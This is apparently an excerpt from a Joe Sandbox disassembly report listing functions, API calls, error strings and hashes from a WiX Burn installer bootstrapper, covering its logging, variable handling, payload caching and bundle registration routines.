                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0087BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B210
                                                            • GetLastError.KERNEL32(?,0087BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0087B21C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandleLastModule
                                                            • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                            • API String ID: 4242514867-926796631
                                                            • Opcode ID: 142f07a783171b6401674c4d14f4f5a884130ea43f088fb0c76c210b2f7ea4be
                                                            • Instruction ID: c91a38466e428638f73cbfe8574e9413f98d3f09448bc242a3c15042353f8c0f
                                                            • Opcode Fuzzy Hash: 142f07a783171b6401674c4d14f4f5a884130ea43f088fb0c76c210b2f7ea4be
                                                            • Instruction Fuzzy Hash: AD410B32281610A7C72115558C86FEE2652FF85B31F65C039F919EF387D7BDC84292E6
                                                            Function 0087694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0087699B
                                                            • GetLastError.KERNEL32 ref: 008769A5
                                                            • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 008769E8
                                                            • GetLastError.KERNEL32 ref: 008769F2
                                                            • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00876B03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                            • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                            • API String ID: 3057421322-109962352
                                                            • Opcode ID: 356a223c6f2e2e4cf80a6f1c91cdb79e4506fa5387ad2c8388cee6f5e7ebb2c1
                                                            • Instruction ID: 46c54dec24b97ee2c7b3435849179361e696858f56f721b9387849989cae7b53
                                                            • Opcode Fuzzy Hash: 356a223c6f2e2e4cf80a6f1c91cdb79e4506fa5387ad2c8388cee6f5e7ebb2c1
                                                            • Instruction Fuzzy Hash: F941B432D416399BDB219B688C49BEABBA4FB08710F008195E90CF6285F774CE94CF91
                                                            Function 008748EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00875466,?,?,?,?), ref: 00874920
                                                            • GetLastError.KERNEL32(?,?,?,00875466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00874931
                                                            • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00874A6E
                                                            • CloseHandle.KERNEL32(?,?,?,?,00875466,?,?,?,?,?,?,?,?,?,?,?), ref: 00874A77
                                                            Strings
                                                            • Failed to allocate thread local storage for logging., xrefs: 0087495F
                                                            • Failed to create the message window., xrefs: 008749CC
                                                            • Failed to set elevated pipe into thread local storage for logging., xrefs: 008749A8
                                                            • engine.cpp, xrefs: 00874955, 0087499E
                                                            • comres.dll, xrefs: 008749DD
                                                            • Failed to connect to unelevated process., xrefs: 00874916
                                                            • Failed to pump messages from parent process., xrefs: 00874A42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AllocCloseErrorHandleLastMutexRelease
                                                            • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                            • API String ID: 687263955-1790235126
                                                            • Opcode ID: 41f8e748063d1aac38088def47102cdbcd4669d57ae828bd9aed1297cec618f0
                                                            • Instruction ID: 7f02f91606418374336860eff10c7fe711d8f7e599a8a7642dd592262da04767
                                                            • Opcode Fuzzy Hash: 41f8e748063d1aac38088def47102cdbcd4669d57ae828bd9aed1297cec618f0
                                                            • Instruction Fuzzy Hash: 4C419373940626BBC712ABA8CC45EEFFB6CFF04710F004226BA19E2250DB74E95087E1
                                                            Function 00883B4E Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 130COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00883BA2
                                                            • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00883BAC
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00883C15
                                                            • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00883C1C
                                                            • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 00883CA6
                                                            Strings
                                                            • %u\, xrefs: 00883C36
                                                            • logging.cpp, xrefs: 00883BD0
                                                            • Failed to get length of temp folder., xrefs: 00883C06
                                                            • Failed to get temp folder., xrefs: 00883BDA
                                                            • Failed to format session id as a string., xrefs: 00883C4A
                                                            • crypt32.dll, xrefs: 00883B61
                                                            • Failed to get length of session id string., xrefs: 00883C71
                                                            • Failed to copy temp folder., xrefs: 00883CCF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                            • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
                                                            • API String ID: 2407829081-3274134579
                                                            • Opcode ID: 19065652d6eacbcae8493a5e2d7f68b5a0a246659a46e4ada6bc0bfb172e1688
                                                            • Instruction ID: 4e31252d3bd10afeb5891841fe2acf84bf803e0e47cd464ff9f02f1cdafb0270
                                                            • Opcode Fuzzy Hash: 19065652d6eacbcae8493a5e2d7f68b5a0a246659a46e4ada6bc0bfb172e1688
                                                            • Instruction Fuzzy Hash: A7419E72D8123DABCB21AB588C49FDAB778FB10B10F1046A5F918F7241DA709F858BD1
                                                            Function 00877FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00877FC2
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008781EA
                                                            Strings
                                                            • feclient.dll, xrefs: 0087809D, 008780F3, 00878134
                                                            • Failed to get version., xrefs: 0087819B
                                                            • Unsupported variable type., xrefs: 008781A7
                                                            • Failed to write variable name., xrefs: 008781D1
                                                            • Failed to write variable count., xrefs: 00877FDD
                                                            • Failed to write literal flag., xrefs: 008781C3
                                                            • Failed to get string., xrefs: 008781B5
                                                            • Failed to write variable value as number., xrefs: 00878194
                                                            • Failed to get numeric., xrefs: 008781BC
                                                            • Failed to write variable value as string., xrefs: 008781AE
                                                            • Failed to write included flag., xrefs: 008781D8
                                                            • Failed to write variable value type., xrefs: 008781CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                            • API String ID: 3168844106-2118673349
                                                            • Opcode ID: 6af2ebdc8a956ac914b38faf104ce4bc6806461c4ed39c30426d0d3f151b6770
                                                            • Instruction ID: 25bdf0523642fbdd5bd3a056b3f9a7e248c5ee5baba9fda076916c9aba9cd70a
                                                            • Opcode Fuzzy Hash: 6af2ebdc8a956ac914b38faf104ce4bc6806461c4ed39c30426d0d3f151b6770
                                                            • Instruction Fuzzy Hash: DB71C232D4461AEFCB129EA8C848AAE7BA4FF04314F50C121F918E7255DB34DD169BB1
                                                            Function 008897B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,0088A843,00000000,00000000,00000000,?,00000000), ref: 008897CD
                                                            • GetLastError.KERNEL32(?,0088A843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008897DD
                                                              • Part of subcall function 008B4102: Sleep.KERNEL32(?,00000000,?,008885EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00874DBC), ref: 008B4119
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008898E9
                                                            Strings
                                                            • cache.cpp, xrefs: 00889801
                                                            • Moving, xrefs: 0088987F
                                                            • Failed to open payload in working path: %ls, xrefs: 0088980C
                                                            • Failed to verify payload hash: %ls, xrefs: 00889875
                                                            • Failed to copy %ls to %ls, xrefs: 008898D7
                                                            • Failed to verify payload signature: %ls, xrefs: 00889838
                                                            • Failed to move %ls to %ls, xrefs: 008898C1
                                                            • %ls payload from working path '%ls' to path '%ls', xrefs: 00889894
                                                            • Copying, xrefs: 00889888, 00889893
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorFileHandleLastSleep
                                                            • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
                                                            • API String ID: 1275171361-1604654059
                                                            • Opcode ID: 543cb95730e2c3875e5a6239a3ada480e790f30719ab419f7ae982b87fbe1e42
                                                            • Instruction ID: fd7df06c41f1a36852807c82eca115bac0aa5fe469c808c413d2280fcc94bb41
                                                            • Opcode Fuzzy Hash: 543cb95730e2c3875e5a6239a3ada480e790f30719ab419f7ae982b87fbe1e42
                                                            • Instruction Fuzzy Hash: 5731A7729406667BDA2236594C46F7B2A28FF42B50F090135FD55FB391D664DC009BE2
                                                            Function 008765C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 008765FC
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00876628
                                                            • GetLastError.KERNEL32 ref: 00876636
                                                            • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0087666E
                                                            • GetLastError.KERNEL32 ref: 00876678
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008766BB
                                                            • GetLastError.KERNEL32 ref: 008766C5
                                                            Strings
                                                            • variable.cpp, xrefs: 0087665A, 0087669C
                                                            • Failed to backslash terminate system folder., xrefs: 00876708
                                                            • Failed to get 32-bit system folder., xrefs: 008766A6
                                                            • Failed to set system folder variant value., xrefs: 00876724
                                                            • Failed to get 64-bit system folder., xrefs: 00876664
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                            • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
                                                            • API String ID: 325818893-1590374846
                                                            • Opcode ID: 13c2c9c3ef4081e0837b02103377cb8bdb2eac433e7e6039b4bce6edb88e16c3
                                                            • Instruction ID: df7da1d0c8c6ad06b550567f43ad9c9e914521a722462562f580a185ac48da9b
                                                            • Opcode Fuzzy Hash: 13c2c9c3ef4081e0837b02103377cb8bdb2eac433e7e6039b4bce6edb88e16c3
                                                            • Instruction Fuzzy Hash: 79311672D41A39A7CB30A7548C89B9A7768FF10790F058265BD18FB285F774DD408AE2
                                                            Function 00883F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00883AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00883FB5,feclient.dll,?,00000000,?,?,?,00874B12), ref: 00883B42
                                                            • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00874B12,?,?,008BB488,?,00000001,00000000,00000000), ref: 0088404C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseSleep
                                                            • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                            • API String ID: 2834455192-2673269691
                                                            • Opcode ID: 78b7e6f7b36b29ab729974a9477754f2eef1ca4fd3ae4e710336e647bab2a4fc
                                                            • Instruction ID: 585d1d9fc14c8b24daf90b09a856f8249fc95d4d109c0b056ca6b3c063ba3f72
                                                            • Opcode Fuzzy Hash: 78b7e6f7b36b29ab729974a9477754f2eef1ca4fd3ae4e710336e647bab2a4fc
                                                            • Instruction Fuzzy Hash: C561C472A00A17BBDB25BF68CC46B6B7BB8FF10740B049159F901DB241EB71ED9087A1
                                                            Function 00876DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000001,?,00000000,00875445,00000006,?,008782B9,?,?,?,00000000,00000000,00000001), ref: 00876DC8
                                                              • Part of subcall function 008756A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00876595,00876595,?,0087563D,?,?,00000000), ref: 008756E5
                                                              • Part of subcall function 008756A9: GetLastError.KERNEL32(?,0087563D,?,?,00000000,?,?,00876595,?,00877F02,?,?,?,?,?), ref: 00875714
                                                            • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,008782B9), ref: 00876F59
                                                            Strings
                                                            • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00876F6B
                                                            • Failed to find variable value '%ls'., xrefs: 00876DE3
                                                            • Setting numeric variable '%ls' to value %lld, xrefs: 00876EFA
                                                            • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00876ED0
                                                            • Unsetting variable '%ls', xrefs: 00876F15
                                                            • variable.cpp, xrefs: 00876E4B
                                                            • Failed to set value of variable: %ls, xrefs: 00876F41
                                                            • Setting string variable '%ls' to value '%ls', xrefs: 00876EED
                                                            • Setting hidden variable '%ls', xrefs: 00876E86
                                                            • Attempt to set built-in variable value: %ls, xrefs: 00876E56
                                                            • Failed to insert variable '%ls'., xrefs: 00876E0D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                            • API String ID: 2716280545-445000439
                                                            • Opcode ID: b461dcf7d5690130627b784d309db2aca957be814dea71eb79f657db3436be7a
                                                            • Instruction ID: c190c30379d6e1bde937599dd85647f33099d3edb78b091c66ef90cdcfab6891
                                                            • Opcode Fuzzy Hash: b461dcf7d5690130627b784d309db2aca957be814dea71eb79f657db3436be7a
                                                            • Instruction Fuzzy Hash: 31512B72A40615ABDB309F18DC4AFAB7BA8FB51714F208119F80CE6385E675DC60CBE1
                                                            Function 00882C1C Relevance: 19.5, APIs: 1, Strings: 10, Instructions: 299COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000001,006C0064,000000FF,002C002B,000000FF,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 00882C8A
                                                            Strings
                                                            • wininet.dll, xrefs: 00882ED7
                                                            • Failed to add dependent bundle provider key to ignore dependents., xrefs: 00882DF4
                                                            • Failed to create the string dictionary., xrefs: 00882CC3
                                                            • Failed to add registration action for dependent related bundle., xrefs: 00882F8E
                                                            • Failed to add self-dependent to ignore dependents., xrefs: 00882D0E
                                                            • crypt32.dll, xrefs: 00882CD5, 00882DCF, 00882EC4, 00882F39
                                                            • Failed to add dependents ignored from command-line., xrefs: 00882D3F
                                                            • Failed to add registration action for self dependent., xrefs: 00882F57
                                                            • Failed to allocate registration action., xrefs: 00882CF3
                                                            • Failed to check for remaining dependents during planning., xrefs: 00882E30
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to add dependent bundle provider key to ignore dependents.$Failed to add dependents ignored from command-line.$Failed to add registration action for dependent related bundle.$Failed to add registration action for self dependent.$Failed to add self-dependent to ignore dependents.$Failed to allocate registration action.$Failed to check for remaining dependents during planning.$Failed to create the string dictionary.$crypt32.dll$wininet.dll
                                                            • API String ID: 1825529933-1705955799
                                                            • Opcode ID: 50d71efc3a5c40785b4c7fae8dc57118e178bff192f6776262fe955de8a9ec6b
                                                            • Instruction ID: cd578a383b671e0cb2465b889601854ebcf1cdd9f1f605e5fa23130ab98c3435
                                                            • Opcode Fuzzy Hash: 50d71efc3a5c40785b4c7fae8dc57118e178bff192f6776262fe955de8a9ec6b
                                                            • Instruction Fuzzy Hash: FBB16A70A0021AEFDF29EF68C881BAABBB5FF04710F008169F915EB251CB70D950CB91
                                                            Function 0088F90B Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0088F947
                                                            • UuidCreate.RPCRT4(?), ref: 0088FA2A
                                                            • StringFromGUID2.OLE32(?,?,00000027), ref: 0088FA4B
                                                            • LeaveCriticalSection.KERNEL32(?,?), ref: 0088FAF4
                                                            Strings
                                                            • Failed to recreate command-line for update bundle., xrefs: 0088FA12
                                                            • Failed to convert bundle update guid into string., xrefs: 0088FA6A
                                                            • Failed to create bundle update guid., xrefs: 0088FA37
                                                            • update\%ls, xrefs: 0088F9A3
                                                            • EngineForApplication.cpp, xrefs: 0088FA60
                                                            • Failed to set update bundle., xrefs: 0088FACE
                                                            • Failed to default local update source, xrefs: 0088F9B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CreateEnterFromLeaveStringUuid
                                                            • String ID: EngineForApplication.cpp$Failed to convert bundle update guid into string.$Failed to create bundle update guid.$Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
                                                            • API String ID: 171215650-2594647487
                                                            • Opcode ID: 87a126003542f3cb8a867d36373b0e305007412d860cb656781d761531717896
                                                            • Instruction ID: 3470c7304c45cf4af41a3ea28ef9e5aadcb4844938160d8edd1cd16dfc540d1a
                                                            • Opcode Fuzzy Hash: 87a126003542f3cb8a867d36373b0e305007412d860cb656781d761531717896
                                                            • Instruction Fuzzy Hash: 7E614C31940229ABCF25AFA8CC45FAA7BB4FF08724F154179FA09EB252D6719C50CB91
                                                            Function 00874AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(?), ref: 00874C64
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00874C75
                                                            Strings
                                                            • WixBundleLayoutDirectory, xrefs: 00874BF5
                                                            • Failed while running , xrefs: 00874C2A
                                                            • Failed to create the message window., xrefs: 00874B98
                                                            • Failed to set registration variables., xrefs: 00874BDE
                                                            • Failed to query registration., xrefs: 00874BAE
                                                            • Failed to set action variables., xrefs: 00874BC4
                                                            • Failed to check global conditions, xrefs: 00874B49
                                                            • Failed to set layout directory variable to value provided from command-line., xrefs: 00874C06
                                                            • Failed to open log., xrefs: 00874B18
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: MessagePostWindow
                                                            • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                            • API String ID: 3618638489-3051724725
                                                            • Opcode ID: 9349eeb5b947455c04f5ea252465bedd40577318024d14b651c025e91661fe73
                                                            • Instruction ID: fc061f5e311fea26042dfa0db3df2034ca42de9fcbdcb9a415a5b9de0539acf8
                                                            • Opcode Fuzzy Hash: 9349eeb5b947455c04f5ea252465bedd40577318024d14b651c025e91661fe73
